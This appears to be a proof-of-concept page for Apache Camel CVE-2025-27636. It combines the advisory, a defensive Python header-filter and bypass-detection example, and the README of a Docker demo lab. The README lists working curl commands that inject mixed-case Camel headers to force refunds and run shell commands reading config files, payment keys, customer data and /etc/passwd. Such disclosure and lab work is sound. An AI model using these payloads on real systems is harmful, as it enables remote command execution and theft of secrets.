
CVE-2025-27636 PoC — Apache Camel: Camel Message Header Injection via Improper Filtering

Associated Vulnerability
Title: Apache Camel: Camel Message Header Injection via Improper Filtering (CVE-2025-27636)
Description: Bypass/injection vulnerability in Apache Camel components under particular conditions. This issue affects Apache Camel from 4.10.0 through 4.10.1, from 4.8.0 through 4.8.4, and from 3.10.0 through 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header filter, which allows an attacker to include Camel-specific headers that, for some Camel components, can alter behaviour: in the camel-bean component, to call another method on the bean than was coded in the application; in the camel-jms component, a malicious header can be used to send the message to another queue (on the same broker) than was coded in the application. The same could be seen with the camel-exec component. The attacker would need to inject custom headers, such as via HTTP. So if you have Camel applications that are directly connected to the internet via HTTP, an attacker could include malicious HTTP headers in the HTTP requests that are sent to the Camel application. All the known Camel HTTP components such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http, and camel-netty-http would be vulnerable out of the box. Under these conditions an attacker could forge a Camel header name and make the bean component invoke other methods in the same bean.
The components that use the default header filter strategy are:
* camel-activemq
* camel-activemq6
* camel-amqp
* camel-aws2-sqs
* camel-azure-servicebus
* camel-cxf-rest
* camel-cxf-soap
* camel-http
* camel-jetty
* camel-jms
* camel-kafka
* camel-knative
* camel-mail
* camel-nats
* camel-netty-http
* camel-platform-http
* camel-rest
* camel-sjms
* camel-spring-rabbitmq
* camel-stomp
* camel-tahu
* camel-undertow
* camel-xmpp
The vulnerability arises from a bug in the default filtering mechanism, which only blocks headers starting with "Camel", "camel", or "org.apache.camel." (a case-sensitive check).
Mitigation: You can easily work around this in your Camel applications by removing the headers in your Camel routes. There are many ways of doing this, globally or per route. For example, you could use the removeHeaders EIP to filter out anything like "cAmel", "cAMEL" etc., or in general everything that matches "Camel", "camel" or "org.apache.camel." case-insensitively.
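The filter bug and the mitigation described above, as an added example that is not Apache Camel's own code: a model of the case-sensitive prefix filter next to a case-insensitive replacement (the behaviour the removeHeaders workaround and the fixed releases give you), plus a check that flags header names which pass the old filter but not the new one, which is the set worth alerting on when reviewing access logs or writing WAF rules. The sample request is constructed; its header names are taken from the commands in the README below.

```python
import re

# Prefixes the vulnerable default filter blocked, as stated in the advisory:
# a plain, case-sensitive startswith() check.
BLOCKED_PREFIXES = ("Camel", "camel", "org.apache.camel.")

# Case-insensitive equivalent, mirroring the removeHeaders(...) workaround and
# the shipped fix. "Camel" and "camel" collapse to one pattern once case is ignored.
_BLOCKED_RE = re.compile(r"^(camel|org\.apache\.camel\.)", re.IGNORECASE)


def vulnerable_filter(headers):
    """Drop inbound headers the way the affected versions did.

    'cAmelBeanMethodName' survives because no blocked prefix matches it
    byte-for-byte, yet Camel's own header lookup is case-insensitive, so the
    bean component still honours it downstream."""
    return {k: v for k, v in headers.items() if not k.startswith(BLOCKED_PREFIXES)}


def hardened_filter(headers):
    """Drop every header that is a Camel-internal name under any casing."""
    return {k: v for k, v in headers.items() if not _BLOCKED_RE.match(k)}


def bypass_attempts(headers):
    """Names that pass the old filter but fail the new one: exactly the casing
    tricks the bug required, so a non-empty result is a strong detection signal."""
    return sorted(k for k in headers
                  if _BLOCKED_RE.match(k) and not k.startswith(BLOCKED_PREFIXES))


# Constructed inbound request. HTTP headers and query parameters are treated
# alike here, since Camel's HTTP components expose both as message headers.
SAMPLE_HEADERS = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Request-Id": "demo-1",
    "CamelBeanMethodName": "processRefund",        # blocked before and after the fix
    "cAmelBeanMethodName": "processRefund",        # bypassed the old filter
    "cAmelExecCommandExecutable": "/bin/sh",       # bypassed the old filter
    "ORG.APACHE.CAMEL.Internal": "x",              # constructed casing variant
}

if __name__ == "__main__":
    print("kept by vulnerable filter:", sorted(vulnerable_filter(SAMPLE_HEADERS)))
    print("kept by hardened filter:  ", sorted(hardened_filter(SAMPLE_HEADERS)))
    print("bypass attempts:          ", bypass_attempts(SAMPLE_HEADERS))
```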
Readme
# Apache Camel CVE Demonstration

This project demonstrates security vulnerabilities in Apache Camel related to header injection attacks.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports:
```powershell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit vulnerable endpoint by injecting method names:

```shell
# Successful attack - case-sensitive header
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - query parameter injection
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```shell
# Wrong case - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```

### 2. Command Execution Attack

Exploit exec component to execute arbitrary commands:

**Reconnaissance:**
```shell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```shell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs: aux"
```

## Verify Attack Results

Check the attack logs inside the container:

```shell
# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint

File Snapshot

[4.0K] /data/pocs/08061139e9b09f57d198f0af027c523ccd1f0873
├── [4.6K] Dockerfile
├── [4.1K] pom.xml
├── [3.3K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] camel
        │               ├── [ 881] CamelCveDemoApplication.java
        │               ├── [4.0K] config
        │               │   ├── [1.5K] CamelConfig.java
        │               │   └── [ 903] CorsConfig.java
        │               ├── [4.0K] controller
        │               │   └── [ 523] WebController.java
        │               ├── [4.0K] routes
        │               │   ├── [5.9K] BeanRoute.java
        │               │   └── [6.5K] ExecRoute.java
        │               └── [4.0K] service
        │                   └── [6.1K] DemoService.java
        └── [4.0K] resources
            ├── [ 530] application.properties
            ├── [1.3K] logback-spring.xml
            └── [4.0K] static
                └── [ 11K] index.html

13 directories, 13 files